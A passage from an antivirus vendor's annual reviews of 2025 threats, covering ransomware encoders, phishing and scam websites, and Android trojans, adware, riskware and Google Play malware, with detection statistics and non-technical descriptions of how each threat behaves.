BackDoor.AgentTeslaNET.20: Spyware designed to steal confidential information. For example, it collects and sends logins and passwords from numerous programs, such as browsers, messengers, email clients, databases, and more, to the attackers. It also steals clipboard contents, implements Keylogging functionality, and can take screenshots.
Win32.Expiro.153: A file virus that infects Windows executable files. Its main purpose is to steal passwords for various programs.
JS.DownLoader.1225: Heuristic detection for ZIP archives containing JavaScripts with suspicious names.
Trojan.PackedNET.3223: Detection for malicious programs protected with a packer.
Trojan.AutoIt.1413: The detection name for a packed version of the Trojan.AutoIt.289 malicious app, written in the AutoIt scripting language. This trojan is distributed as part of a group of several malicious applications, including a miner, a backdoor, and a self-propagating module. Trojan.AutoIt.289 performs various malicious actions that make it difficult for the main payload to be detected.

Encryption ransomware

Compared with 2024, in 2025, Doctor Web’s technical support service registered 35.98% fewer user requests to decrypt files affected by encryption trojans. The dynamics of when those requests were registered is shown in the graph below:

The most common encoders of 2025:

Trojan.Encoder.35534 (23.22% of user requests): An encoder trojan also known as Mimic. It uses the everything.dll library from the legitimate software Everything, which is designed to instantly locate files on Windows computers.
Trojan.Encoder.35209 (3.33% of user requests): An encoder trojan based on the source code of the Conti encoder malware. It encrypts files using the ChaCha20 algorithm. Now that some of the threat actors’ C2 servers have been taken down and the private RSA encryption keys have been disclosed, files affected by some modifications of this trojan can be decrypted.
Trojan.Encoder.35067 (2.50% of user requests): An encoder trojan also known as Macop (Trojan.Encoder.30572 is one of its other variants). It is small in size, about 30-40 Kbytes. This is partially due to the fact that the trojan does not carry third-party cryptographic libraries and uses exclusively CryptoAPI functions for encryption and key generation. It uses the AES-256 algorithm to encrypt files, and the keys themselves are encrypted with RSA-1024.
Trojan.Encoder.41868 (2.31% of user requests): An encoder whose artifacts indicate that the hacker group C77L was involved in its creation.
Trojan.Encoder.29750 (2.13% of user requests): A ransomware trojan with multiple versions. Its current modifications use the AES-256+RSA algorithm to encrypt files.

Network fraud

In 2025, Doctor Web’s Internet analysts observed an increase in the number of phishing websites created for stealing Telegram messenger accounts. Malicious actors used various techniques: fake authentication and authorization pages, fake messages from Telegram support warning of alleged messenger-usage violations requiring account “verification”, etc.

An example of a phishing website informing the user that they must verify their Telegram account due to a violation of the platform’s terms of service

Similar sites were also created to target users of other services, such as gaming platforms, online stores, and so on. The fakes could look like genuine Internet resources and invited potential victims to log into their account. If users fell for the trick, their confidential information ended up in the attackers’ hands.

A fake website for the Steam platform displays a phishing form for entering a login and password

Users once again encountered various types of fraudulent online resources offering all sorts of gifts and bonuses as well as the chance to participate in certain “lucrative promotions”. Commonplace were fake sites of Russian marketplaces where visitors could supposedly participate in a prize drawing. The “winnings” were programmed into the websites, and to “receive” the prizes, victims were required to make a certain payment—for example, supposedly in the form of a tax, then a delivery fee for the goods, and then a fee to insure them. In other variations of this scam, the desired item was allegedly unavailable, but a cash equivalent was offered instead. To “get” the money, the user was also required to make some payments: in the form of fees, insurance, etc. In the end, the victim never received any prize.

An example of a fake marketplace website offering the chance to participate in a “prize drawing”

Variants of similar schemes included fake transport company websites targeting residents of Great Britain. These offered people the chance to participate in a drawing for transport cards that were supposedly timed to a certain event and allowed free use of public transportation services. After a “win”, fraudsters asked victims to provide personal data and pay a small “fee”.

A fraudulent website, allegedly belonging to a transportation company, offers people the chance to participate in a transport card drawing

All sorts of fraudulent finance-themed sites remained relevant. Once again popular with scammers were web resources offering opportunities to make money by trading on the market using automated systems based on unique algorithms and artificial intelligence technologies. Such sites are created to target users from many countries. They usually request personal information from users wanting to register a “request” or an “account”. Such information ends up in the attackers’ hands—for them to use at their own discretion. Threat actors can resell the data or continue luring potential victims into the fake investment service, demanding that users deposit money into the “trading” account.

One fraudulent site offering access to an “investment platform” based on AI technologies was allegedly related to the Apple Corporation

Many of these sites are created using similar templates in the form of a fake chat with a “virtual assistant” or an “employee” of a particular company, and the fraudsters contact potential victims by assuming one of those roles. Users are asked to answer several questions and then provide personal data.

On one of the websites, scammers offered French users access to non-existent automated trading software called Trader AI, which would allegedly allow them to make money, starting from €3,500

One Internet resource advertised an investment service that was supposedly built directly on the basis of the Telegram messenger. This website promised an income of €10,000 per month, thanks to automated trading of global company shares “directly in the phone’s browser”.

A fraudulent website invites users to join a “Telegram platform” that supposedly trades stocks automatically

Scammers also offered potential victims a chance to make money using “trading bots” that were supposedly created with the participation of large companies and services such as Telegram, WhatsApp, TikTok, and others.

An example of a website that invited potential victims to use a non-existent trading bot, allegedly related to the WhatsApp messenger

Throughout 2025, our Internet analysts discovered new fraudulent sites offering users in many countries, including Russia and countries of the CIS (Commonwealth of Independent States) and Europe, opportunities to invest in the oil and gas sector. Typically, on such sites, potential victims are also asked to provide personal information, such as their first and last names, mobile phone number, email address, etc.

A fraudulent site targeting Kyrgyz citizens offers them the opportunity to “make money from oil and gas”, promising large profits

Our analysts observed the emergence of more fraudulent websites offering “government support” in the form of payments or compensation. For instance, commonly occurring in the Russian Internet segment were fraudulent web resources purporting to be connected to the Gosuslugi (Госуслуги) portal.

An example of a fraudulent website purporting to be linked to the Gosuslugi service and promising Russian users stable payments from the government and a major oil and gas company. To “participate” in the “payment program”, victims were asked to provide personal data

Our experts also noted the emergence of more fake education project websites. These offered users opportunities to take various education and training courses to improve their financial literacy, master a particular profession, etc. To “access” the training, potential victims, as in many other similar schemes, were also asked for personal information.

One of the fraudulent sites offering users the opportunity to learn English

Doctor Web’s Internet analysts detected new fraudulent sites selling theater tickets. On such resources, fraudsters offer potential victims discounted tickets for purchase, but after making “payment”, the victims do not receive them.

An example of a fraudulent website selling non-existent theater tickets

In addition, new fake websites for private cinemas were also common. As in the case with the theater tickets, scammers offer potential victims movie tickets for purchase, but the victims end up handing over their money to the fraudsters.

The fake site of a private cinemaв

Mobile devices

According to detection statistics collected by Dr.Web Security Space for mobile devices, in 2025, users were most likely to encounter the ad-displaying trojans Android.MobiDash and Android.HiddenAds and also Android.FakeApp programs, which, instead of providing the declared functionality, can load various websites, including fraudulent and malicious ones. Android.Triada trojans were more active. These are multifunctional threats that cybercriminals embed into the firmware of Android devices. Moreover, the number of Android.Banker banking trojan attacks increased. At the same time, Android.SpyMax banking trojans were less active.

Last year, malware creators continued using various techniques to protect their malicious Android apps. One method involved converting DEX code to C code (also known as DCC).

The most common unwanted apps were Program.FakeMoney programs. These offer users virtual rewards for completing various tasks and promise them that they can convert these rewards into real money. But, in reality, these apps do not have such an option. In addition, the apps Program.FakeAntiVirus.1 and Program.CloudInject.1 were also frequently detected on protected devices. The former imitates the work of anti-viruses and detects non-existent threats, offering to “cure” infections for users if they purchase the full version of the software. The latter are programs modified via a popular cloud service. When they are being modified, dangerous system permissions and an obfuscated code, whose purpose cannot be controlled, are added to them.

Programs modified with the NP Manager utility (these programs are detected as Tool.NPMod) became the most widespread riskware. The NP Manager tool obfuscates the code of the modified programs and allows their digital signature verification to be bypassed. The most active adware apps in 2025 were Adware.ModAd.1 programs, third-party WhatsApp messenger mods that automatically open advertising links when the messenger is in use.

In 2025, new cases of Android device firmware infections were identified. Our company informed users about one of them in April. Threat actors had preinstalled Android.Clipper.31 malware into the system storage area of a number of budget smartphone models and used it to steal cryptocurrency from users. Other attackers managed to implant dangerous Android.Triada trojans into the firmware of some other Android smartphone models. In addition, more cases of Android TV box sets having their firmware infected with new versions of the Android.Vo1d trojan, which our company discovered in 2024, have been recorded.

Over the past year, Doctor Web’s anti-virus laboratory identified a number of dangerous malicious programs. In April, we informed users about the Android.Spy.1292.origin trojan, which was hidden in Alpine Quest mapping software that had been modified by threat actors. Android.Spy.1292.origin targeted Russian military personnel and sent the attackers information about their infected devices: mobile phone numbers and accounts, collected phonebook contacts, geolocation data, and information about the files stored in the devices’ memory. It could also steal certain files when commanded to do so by the attackers. Malicious actors were interested in getting their hands on confidential documents sent via messengers and also in obtaining Alpine Quest location log files.

In August, our specialists warned about the Android.Backdoor.916.origin backdoor, which cybercriminals had disguised as an anti-virus and were distributing via direct messages in messengers. Android.Backdoor.916.origin steals confidential information and allows criminals to spy on users. Employees of Russian companies were this backdoor’s main target.

In October, we informed users about the multi-functional backdoor Android.Backdoor.Baohuo.1.origin, which our virus analysts discovered in modified versions of the Telegram X messenger. This malware is also used to steal confidential data, including Telegram logins and passwords, incoming SMS, chats in the messenger, and clipboard data. At the same time, the backdoor allows attackers to completely control the messenger and the victim’s hacked Telegram account. To control the backdoor, cybercriminals used both a C2 server and a Redis database—something not seen previously in Android threats. Android.Backdoor.Baohuo.1.origin mainly targeted users in Indonesia and Brazil.

To find out more about the security-threat landscape for mobile devices in 2025, read our special overview.

Prospects and possible trends

In the New Year 2026, adware trojans that help cybercriminals make illegal profits will likely remain one of the most common threats to users. We can expect that malicious actors will increasingly use banking trojans, which also allow them to enrich themselves.

Further growth in the popularity of various tools and techniques that help conceal malicious activity may occur. Such techniques include the use of packers and obfuscators, malicious droppers and multi-stage downloaders, and steganography to conceal payloads. In addition, when creating malicious software, cybercriminals, including those with little programming experience, will increasingly resort to the help of AI assistants. As a result, more families of malware will emerge, and the number of threats will increase.

Government and corporate structures will once again be in the crosshairs of cybercriminals, resulting in further targeted attacks. New cases of firmware infections in Android smartphones, TV box sets and other types of mobile devices are also likely to occur, especially in the budget segment. Online scammers will remain active.

Doctor Web’s review of virus activity on mobile devices in 2025

Thu, 15 Jan 2026 00:00:00 GMT

January 15, 2026

Overview

In 2025, Android device users were most likely to encounter ad-displaying trojans and fake apps used for fraudulent purposes.

As in the previous year, the most common unwanted software programs were those offering game-like tasks to complete in exchange for virtual rewards. Users were promised the ability to convert their rewards into real money, but, in reality, no such opportunities were provided.

The most active riskware programs were apps modified with the NP Manager tool. This tool obfuscates and protects the code of modified programs so that it becomes more difficult to be analyzed and detected, and also allows digital signature verification to be bypassed once the programs are modified. The most commonly detected adware programs were unofficial WhatsApp messenger mods that automatically open advertising links when the app is in use.

Last year, new cases of malware being implanted into the firmware of various Android device models were recorded. We informed users about one of them in spring 2025. Cybercriminals had managed to pre-install the Android.Clipper.31 trojan on several budget smartphone models and used it to steal their victims’ cryptocurrency.

Also in spring, our specialists discovered the Android.Spy.1292.origin trojan, which threat actors had embedded into a modified version of Alpine Quest mapping software. This malware targeted Russian military personnel and was used for cyberespionage purposes.

In late summer, Doctor Web’s anti-virus laboratory informed users about Android.Backdoor.916.origin, a backdoor being distributed via popular messengers. The attackers used it to spy on employees of Russian companies and collect their confidential information.

Already in the fall, we warned about the dangerous Android.Backdoor.Baohuo.1.origin backdoor, which cybercriminals had embedded into modifications of the Telegram X messenger. This malicious program allowed intruders to hack their victims’ Telegram accounts and control the messenger on behalf of the account owners.

Over the last 12 months, Doctor Web's anti-virus laboratory identified more than 180 threats on Google Play, which have been downloaded over 2,165,000 times. Among them were various trojans that subscribe users to paid services and fake apps used for fraud, as well as new adware and unwanted software.

In 2025, malware creators continued utilizing various techniques aimed at complicating the analysis of malicious Android programs and evading anti-viruses. Converting DEX code into C code was one of the popular methods employed. In addition, our virus analysts noted that when creating malware, threat actors are using AI assistants that help write their apps’ code.

Principal trends in 2025

Ad-displaying trojans were once again the most common Android threats
The NP Manager tool, used to obfuscate the code of modified apps and allow digital signature verification to be bypassed after the apps are modified, has grown in popularity
Banking trojans were more active
New cases of Android devices with infected firmware have been identified
Cybercriminals continued using both new and well-known techniques to protect malware from detection and analysis
Malware creators have been actively using AI assistants to write malicious code
New threats emerged on Google Play

The most notable events of 2025

In April 2025, Doctor Web’s experts uncovered a large-scale campaign to steal cryptocurrency from Android device owners. Threat actors compromised the supply chain of several Chinese manufacturers and embedded the Android.Clipper.31 trojan into the firmware of several budget smartphone models. Malware creators built this trojan into a modified version of WhatsApp messenger. For this, they used the LSPatch instrument, which allows them to alter the apps’ operating logic without changing their code.

Android.Clipper.31 intercepts messages sent and received in the messenger, searches for the addresses of the Tron and Ethereum crypto wallets in them, and replaces them with addresses belonging to the attackers. At the same time, the trojan conceals this substitution, and in such messages, victims are shown the correct wallets. Android.Clipper.31 also sends all jpg, png, and jpeg images to threat actors in order to search for saved mnemonic phrases that allow access to crypto wallets. Cybercriminals also embedded Android.Clipper.31 in dozens of other apps, including popular crypto wallet programs, QR scanners, and other messengers, like Telegram. These modifications were distributed through malicious websites.

In 2025, new cases emerged of malware being preinstalled into the system area of Android devices. One malicious group, for example, was able to embed new versions of dangerous Android.Triada trojans into the firmware of a number of budget smartphones. Triada malware poses a threat because it can infect the Zygote system process. This process is directly involved in launching all applications in the system, so Triada trojans can subsequently inject themselves into any application on the device, effectively gaining complete control over it. Threat actors use these trojans to download and install other malware as well as unwanted apps and adware. Moreover, attackers can use them to spy on victims, subscribe users to paid services, and so on. New cases of Android TV box sets having infected firmware were also identified. These cases involved new versions of the Android.Vo1d trojan, which our company discovered in 2024. The Vo1d malware is a backdoor that places its component into the system area of infected devices and can covertly download and install third-party software upon receiving attackers’ commands.

Also in April, our anti-virus laboratory detected a campaign to distribute the Android.Spy.1292.origin spyware trojan, targeting Russian military personnel. Threat actors embedded this malware into one of the versions of Alpine Quest mapping software and distributed it via their Telegram channel, which they passed off as the official one. A Russian Android app catalog was another source for its distribution.

The Telegram channel that attackers used to distribute a malicious Alpine Quest modification containing Android.Spy.1292.origin

Android.Spy.1292.origin sent a variety of confidential data to the cybercriminals, including mobile phone number and account information, phone book contacts, and the device’s geolocation and the files stored in its memory. The trojan could also steal certain files when commanded to do so by the attackers. Threat actors were interested in confidential documents that users sent via popular messaging apps as well as the Alpine Quest app’s location log file.

In August, we reported on cases of the Android.Backdoor.916.origin backdoor being distributed via direct messages in popular messaging apps. The attackers offered potential victims an “anti-virus” that could be installed from the APK file attached to the messages. This file was, in fact, concealed malware. Our anti-virus laboratory discovered the first Android.Backdoor.916.origin versions in January 2025 and has been monitoring their activity ever since, which allowed us to quickly identify this campaign.

Android.Backdoor.916.origin misleads users by imitating the operation of an anti-virus

When installed on an Android device, Android.Backdoor.916.origin allows confidential information to be stolen and users to be spied on. For instance, via this backdoor, threat actors can listen to conversations, broadcast from a device’s camera, track geolocation, and steal content from messengers and browsers. Moreover, Android.Backdoor.916.origin implements keylogger functionality to intercept entered text, including passwords. According to our experts, the backdoor is used in targeted attacks and is not intended for mass distribution. The primary target for cybercriminals is employees of Russian companies.

In October, Doctor Web published information on the multi-functional backdoor Android.Backdoor.Baohuo.1.origin, which our malware analysts discovered in modified versions of the Telegram X messenger. The main source of its distribution was via malicious websites to which potential victims are directed through ads in mobile programs. On such sites, users are encouraged to install Telegram X, supposedly to find a partner for conversation and dating. And these Internet resources are primarily targeting residents of Indonesia and Brazil. At the same time, we also detected this backdoor in a number of third-party Android app catalogs.

An example of a malicious website from which the trojan version of Telegram X was downloaded

One of Android.Backdoor.Baohuo.1.origin’s tasks is to steal confidential data. For example, the malicious program steals the login and password from the victim’s Telegram account, the messenger’s chat history, incoming SMS, and the phone book contacts; it can also intercept the clipboard contents. However, threat actors use it not only as a spyware tool. With the help of Android.Backdoor.Baohuo.1.origin, they can practically control both the hacked account and the messenger itself, altering its functionality. For instance, the backdoor allows threat actors to covertly add and remove users from Telegram channels, join conversations on their behalf and conceal devices authorized for their account. To perform actions that require changing the app’s operating logic, the Xposed framework is used. Cybercriminals control the backdoor both in the traditional way–via a C2 server–and by sending commands through the Redis database, something not seen previously in other Android malware. The total number of devices infected with Android.Backdoor.Baohuo.1.origin exceeded 58,000, while over 3,000 different models of smartphones, tablets, TV box sets, and even cars with Android-based on-board computers, were affected.

Countries with the highest number of devices infected with Android.Backdoor.Baohuo.1.origin

Statistics

According to detection statistics collected by Dr.Web Security Space for mobile devices, the most common Android threats in 2025 were various malicious programs. Users encountered them in 81.11% of cases. These were followed by potentially dangerous apps, whose share was 10.73%. Adware apps, detected in 5.89% of cases, ranked third. Unwanted programs were the least detected threats as they accounted for 2.27% of detections.

Compared to the previous year, the share of malicious and potentially dangerous programs increased, while the share of unwanted software and adware decreased.

Malicious programs

For several years, ad-displaying trojans from the Android.HiddenAds family have been the most commonly detected malware. In 2025, the situation did not change, although over the course of the last 12 months, their share slightly decreased from 31.95% to 27.42%.

These trojans display intrusive ads in the form of full-screen banners and videos. To make it harder for users to detect and delete them from their infected devices, such malicious programs try to “hide” after installation. For example, they can conceal or substitute their icons in the home screen menu.

The most active member of this family, accounting for more than a third of detections, was Android.HiddenAds.657.origin. This trojan came to the attention of our virus analysts back in 2024, and has been in the lead ever since. Android.HiddenAds.657.origin is one of many variants of Android.HiddenAds.1994, a malicious app known since 2021. Several new versions of the latter, like Android.HiddenAds.666.origin and Android.HiddenAds.673.origin, were also distributed in 2025. It is possible that over time they may also rise to the top positions, as previously happened with other Android.HiddenAds.1994 modifications.

Over the course of 2025, users again encountered Aegis, a subfamily of Android.HiddenAds. But the share of such trojans in the total number of times the family was detected significantly decreased—from 17.37% to 3.11%. These trojans can automatically run after installation. Among the most active variants were Android.HiddenAds.Aegis.1 and Android.HiddenAds.Aegis.8.origin.

The second most common malware programs were the ad-displaying trojans Android.MobiDash, whose share increased from 5.38% to 15.64%. Android.MobiDash.7859 was the top modification among them. These trojans were followed by Android.FakeApp—fake programs that cybercriminals use for fraudulent purposes. Android.FakeApp malware can load various websites instead of providing the declared functionality. Such trojans accounted for 10.94% of detections, which is lower than the 2024 figure, when their share was 18.28%. Such a decrease was, in part, due to the fact that the Android.FakeApp.1600 trojan was less active. However, this malicious program still remains the most widespread member of the family. Its main task is to load online casino websites.

The share of trojans from the Android.Spy family, which implement a variety of spyware functionality, decreased from 11.52% to 3.09%. At the same time, the activity of banking trojans increased. Their share of the total number of malware detections was 6.94%, compared to 6.29% a year earlier.

In 2025, the number of software packer detections increased from 5.49% to 6.01%. Threat actors can use such instruments to shield malware from detection and analysis. Malicious apps containing the packer Android.Packed.57146 were most commonly detected on protected devices.

Various malicious WhatsApp messenger mods were also widespread. Among them were modifications (Dr.Web detects them as Android.Click.1812) that load websites without the victims noticing. Multi-functional trojans from the Android.Triada family also increased their activity—from 2.74% to 7.48%. Cybercriminals can embed such trojans into the firmware of Android devices.

The ten malicious programs most commonly detected in 2025:

Android.HiddenAds.657.origin
Android.HiddenAds.4214
Android.HiddenAds.655.origin
Android.HiddenAds.4213
Android.HiddenAds.666.origin: Trojan apps designed to display intrusive ads. Members of the Android.HiddenAds family are often distributed as popular and harmless applications. In some cases, other malware can install them in the system directory. When these infect Android devices, they typically conceal their presence from the user. For example, they “hide” their icons from the home screen menu.
Android.MobiDash.7859: A trojan app that displays obnoxious ads. It is a special software module that developers incorporate into applications.
Android.FakeApp.1600: A trojan app that loads the website that is hardcoded into its settings. Known modifications of this malicious program load an online casino site.
Android.Click.1812: The detection name for malicious WhatsApp messenger mods that can covertly load various websites in the background.
Android.Packed.57146: The detection name for malicious apps that are packed with a popular commercial code obfuscator.
Android.Triada.5847: The detection name for a packer for Android.Triada trojans that is designed to protect them from being detected and analyzed. Threat actors most often use the packer together with the malicious Telegram messenger mods in which these trojans are embedded.

Unwanted software

Program.FakeMoney.11 apps were once again the most widespread unwanted software of 2025, accounting for 51.96% of detections. These programs offer users a reward for completing certain tasks and supposedly allow them to convert the reward into real money. In reality, no actual payouts are made. Along with Program.FakeMoney.11, other similar programs, like Program.FakeMoney.14 and Program.FakeMoney.16, also became widespread. However, users encountered them much less frequently.

Program.FakeAntiVirus.1 apps, which imitate the operation of anti-virus software and detect non-existent threats, were in second place with a share of 10.37%. In order for the infection to be “cured”, they encourage users to buy the full version of the software.

With a share of 6.41%, Program.CloudInject.1 apps, which are modified in the CloudInject cloud service, were the third most frequently encountered unwanted software. Variants of them, detected as Program.CloudInject.5, accounted for 5.08% and came in close behind them, occupying fourth place. Changes to such programs are made directly on a remote server, while access to the service is provided by the utility Tool.CloudInject, which is only a shell for working with it. When apps are modified, dangerous system permissions and an obfuscated code are added to them. Moreover, modders can remotely control the modified apps via the CloudInject service. For example, they can lock the apps and demand that a code be entered to further use them.

In 2025, there was a slight increase in the number of apps detected that can be utilized to monitor users and control their activity. In the hands of malicious actors, such instruments become spyware. For example, the share of the Program.TrackView.1.origin app and its variant, Program.TrackView.2.origin, increased from 2.40% to 2.91% and from 0.21% to 0.97%, respectively. The share of Program.SecretVideoRecorder.1.origin increased from 2.03% to 2.56%, and its variant Program.SecretVideoRecorder.2.origin increased from 0.90% to 1.02%. Program.SnoopPhone.1.origin's figure increased from 0.31% to 1.01%.

The ten unwanted programs most commonly detected in 2025:

Program.FakeMoney.11
Program.FakeMoney.14: The detection name for Android applications that allegedly allow users to earn money by completing different tasks. These apps make it look as if rewards are accruing for each one that is completed. At the same time, users are told that they have to accumulate a certain sum to withdraw their “earnings”. Typically, such apps have a list of popular payment systems and banks that supposedly could be used to withdraw the rewards. But even if users succeed in accumulating the needed amount, in reality they cannot get any real payments. This virus record is also used to detect other unwanted software based on the source code of such apps.
Program.FakeAntiVirus.1: The detection name for adware programs that imitate anti-virus software. These apps inform users of nonexistent threats, mislead them, and demand that they purchase the software’s full version.
Program.CloudInject.1
Program.CloudInject.5: The detection name for Android programs that have been modified using the CloudInject cloud service and the eponymous Android utility (the latter was added to the Dr.Web virus database as Tool.CloudInject). Such programs are modified on a remote server; meanwhile, the modders (users) who are interested in such modifications cannot control exactly what will be added to the apps. Moreover, these programs receive a number of dangerous system permissions. Once modification is complete, modders can remotely manage these apps—blocking them, displaying custom dialogs, tracking when other software is being installed or removed from a device, etc.
Program.TrackView.1.origin
Program.TrackView.2.origin: The detection name for a program that allows users to be monitored via their Android devices. Malicious actors can utilize it to track a target device’s location, take photos and video with the camera, eavesdrop via the microphone, record audio, etc.
Program.SecretVideoRecorder.1.origin
Program.SecretVideoRecorder.2.origin: The detection name for various modifications of an application that is designed to record videos and take photos in the background, using built-in Android device cameras. It can operate covertly by allowing notifications about ongoing recordings to be disabled. It also allows an app’s icon and name to be replaced with fake ones. This functionality makes this software potentially dangerous.
Program.SnoopPhone.1.origin: An application designed to monitor the activity of Android device owners. It allows intruders to read SMS, collect call information, track device location, and record the surroundings.

Riskware

In 2025, the most widespread, potentially dangerous software programs were apps modified using NP Manager, a tool that has been designed to modify programs and that contains various modules for obfuscating and protecting the apps’ code. It is also used to bypass digital signature verification after changes have been made to the apps. Threat actors often use this tool to protect malicious programs in order to make it harder for anti-viruses to detect them. Compared to 2024, the share of such apps increased from 24.52% to 53.59%, and they accounted for more than half of the riskware detections. Most commonly detected on protected devices were variants Tool.NPMod.3 (32.85%), Tool.NPMod.1 (12.61%), Tool.NPMod.1.origin (3.02%), and Tool.NPMod.4 (2.31%).

Tool.Androlua programs—frameworks for developing Android apps in the Lua programming language—were detected more frequently. Their share is now 8.11%, up from 3.93%. Such frameworks require many system permissions, including permission to use the Accessibility Service. Programs created with their help are based on Lua scripts that are encrypted and then decrypted right before execution. Such scripts can potentially be malicious. The share of apps modified with Tool.LuckyPatcher increased from 8.16% to 10.06%. This utility modifies installed apps by downloading specially prepared scripts from the Internet.

At the same time, the share of Tool.SilentInstaller utilities, which allow Android apps to be launched without installing them, decreased from 33.10% to 10.55%. The most commonly detected variants of this family in 2025 were Tool.SilentInstaller.14.origin (4.66%), Tool.SilentInstaller.6.origin (2.07%), and Tool.SilentInstaller.7.origin (1.88%). In addition, the share of the programs protected with the software packer Tool.Packer.1.origin decreased from 13.17% to 2.58%.

The ten riskware apps most commonly detected on protected Android devices in 2025:

Tool.NPMod.3
Tool.NPMod.1
Tool.NPMod.1.origin
Tool.NPMod.4: The detection name for Android programs that have been modified using the NP Manager utility. This tool contains modules for obfuscating and protecting the apps’ code as well as for bypassing their digital signature verification after they are modified. The obfuscation it adds is often used in malware to make it more difficult to detect and analyze.
Tool.Androlua.1.origin: The detection name for some potentially dangerous versions of a specialized framework for developing Android software in the Lua scripting language. The main logic of Lua-based apps resides in the corresponding scripts that are encrypted and decrypted by the interpreter before execution. By default, this framework often requests access to a large number of system permissions in order to operate, including permission to use theAccessibility Service in Android. As a result, the Lua scripts that it executes can potentially perform various malicious actions in accordance with the acquired permissions.
Tool.LuckyPatcher.2.origin
Tool.LuckyPatcher.1.origin: A tool that allows apps installed on Android devices to be modified (i.e., by creating patches for them) in order to change the logic of their work or to bypass certain restrictions. For instance, users can apply it to disable root-access verification in banking software or to obtain unlimited resources in games. To add patches, this utility downloads from the Internet specially prepared scripts, which can be crafted and added to the common database by any third party. The functionality of such scripts can prove to be malicious; thus, patches made with this tool can pose a potential threat.
Tool.SilentInstaller.14.origin: A riskware platform that allows applications to launch APK files without installing them. It creates a virtual runtime environment in the context of the apps in which they are integrated. The APK files, launched with the help of this platform, can operate as if they are part of such programs and can also obtain the same permissions.
Tool.Packer.1.origin: A packer tool designed to protect Android applications from unauthorized modification and reverse engineering. This tool is not malicious in itself, but it can be used to protect both harmless and malicious software.

Adware

Third-party WhatsApp messenger mods, detected as Adware.ModAd.1, topped the list of adware programs detected in 2025. Such modifications are given the functionality needed to open links when the messenger is being worked with. These links redirect users to advertised websites. Compared to 2024, Adware.ModAd.1’s share of all adware apps detected on protected devices decreased from 47.45% to 26.90%.

Adware.Adpush modules, which are embedded into Android apps and display notifications containing ads, ranked second, increasing their share from 14.76% to 26.19%. Third place, with 8.88%, was occupied by members of the Adware.Basement family. Their share remained almost the same, compared to the previous year. Such programs can display ads that lead to malicious websites.

Also prevalent were such adware families as Adware.Airpush (their detection rate rose from 4.35% to 5.14%), Adware.Fictus (an increase from 3.29% to 6.21% was observed), Adware.Youmi (an increase from 1.62% to 2.91% was observed), as well as Adware.Leadbolt (an increase from 2.26% to 2.41% was observed) and Adware.Jiubang (an increase from 1.70% to 2.38% was observed).

The ten most widespread adware programs detected on protected Android devices in 2025:

Adware.ModAd.1: The detection name for some modified versions (mods) of the WhatsApp messenger, whose functions have been injected with a specific code. This code is responsible for loading target URLs by displaying web content (via the Android WebView component) when the messenger is in operation. Such web addresses perform redirects to advertised sites, including online casino, bookmaker, and adult sites.
Adware.AdPush.3.origin
Adware.Adpush.21846
Adware.AdPush.39.origin: Adware modules that can be built into Android apps. They display notifications containing ads that mislead users. For example, such notifications can look like messages from the operating system. In addition, these modules collect a variety of confidential data and are able to download other apps and initiate their installation.
Adware.Basement.1: These apps display unwanted ads that often lead to malicious and fraudulent websites. They share a common code base with Program.FakeMoney.11 unwanted applications.
Adware.Fictus.1.origin: An adware module that malicious actors embed into cloned versions of popular Android games and applications. Its incorporation is facilitated by a specialized net2share packer. Copies of software created this way are then distributed through various software catalogs. When installed on Android devices, such apps and games display obnoxious ads.
Adware.Airpush.7.origin: Adware modules that can be built into Android apps and display various ads. Depending on the modules’ version and modification, these can be notifications containing ads, pop-up windows or banners. Malicious actors often use these modules to distribute malware by offering their potential victims diverse software for installation. Moreover, such modules collect personal information and send it to a remote server.
Adware.Youmi.4: The detection name for an unwanted adware module that adds advertising shortcuts onto the Android OS home screen.
Adware.Jiubang.1: Unwanted ad-displaying software for Android devices that displays a banner showing recommended programs when applications are being installed.
Adware.Inmobi.1: The detection name for some versions of the Inmobi adware SDK. These are capable of making phone calls and adding event entries into an Android device’s calendar.

Threats on Google Play

In 2025, Doctor Web’s anti-virus laboratory discovered over 180 malicious, unwanted, and adware apps, which have been installed a combined total of at least 2,165,040 times. Among them were various modifications of the trojans Android.HiddenAds.4213 and Android.HiddenAds.4215, which concealed their presence on infected devices and displayed ads on top of the system interface and other programs. These trojans were distributed under the guise of image-editing tools, camera apps for taking photos and videos, and some other software.

The programs Time Shift Cam and Fusion Collage Editor were adware trojans from the Android.HiddenAds family

Cybercriminals distributed the cryptocurrency-stealing trojans Android.CoinSteal.202, Android.CoinSteal.203, and Android.CoinSteal.206, disguising them as official software from the Dydx crypto exchange and from the blockchain platforms Raydium and Aerodrome Finance.

The programs Raydium and Dydx Exchange were, in fact, trojans for stealing cryptocurrency

These malicious apps asked users to enter a mnemonic phrase—supposedly for connecting to a crypto wallet. But the information provided was actually sent to the attackers. To further confuse potential victims, the forms for entering mnemonic phrases could be disguised as requests from other crypto platforms.

Android.CoinSteal.206 displays a phishing form, supposedly from the crypto exchange PancakeSwap, that asks users to enter the mnemonic phrase for accessing their crypto wallet

Throughout the year, our specialists uncovered over 80 malicious Android.Joker programs that subscribe users to paid services. They were disguised as various software, including messengers, photography apps, system tools, image-editing programs, and apps for working with documents.

Examples of the discovered Android.Joker trojans. Android.Joker.2494 was distributed as the messenger File Text Messages, and Android.Joker.2496–as the utility Useful Cleaner for optimizing a smartphone’s operation

Cybercriminals again distributed all sorts of Android.FakeApp fake programs, using them in a number of fraudulent schemes. The programs’ main task is to load target websites. Threat actors passed off some of these trojans as finance-related software. Such apps loaded phishing websites as well as fraudulent sites that were supposedly related to investments and online earnings. Other fake apps from this family were distributed as games and, under certain conditions, could load online casino and bookmaker websites. We discovered over 100 such programs on Google Play.

Examples of Android.FakeApp fake programs. The trojan Android.FakeApp.1863 was hidden in the TPAO app and targeted Turkish users, offering them the opportunity to manage deposits and income. The trojan Android.FakeApp.1840 was distributed as the game Pino Bounce and could load an online casino site

Doctor Web’s virus analysts also discovered new adware. Dubbed Adware.Adpush.21912, this program was hidden in the Coin News Promax app with information about cryptocurrencies. Adware.Adpush.21912 displays notifications which, when clicked, load into WebView the link specified by the С2 server.

The Coin News Promax app from Google Play was the adware program Adware.Adpush.21912

In addition, our specialists found Program.FakeMoney.16, an unwanted app distributed as a program called Zeus Jackpot Mania. In this app, users, in a game-like style, obtained virtual rewards that allegedly could be converted into real money and withdrawn from the program.

The Zeus Jackpot Mania app was the unwanted software Program.FakeMoney.16

To “withdraw” the money, users were asked to submit some information to the program, but they did not receive any payouts.

Program.FakeMoney.16 asks the user to provide their full name and information about their bank account

Banking trojans

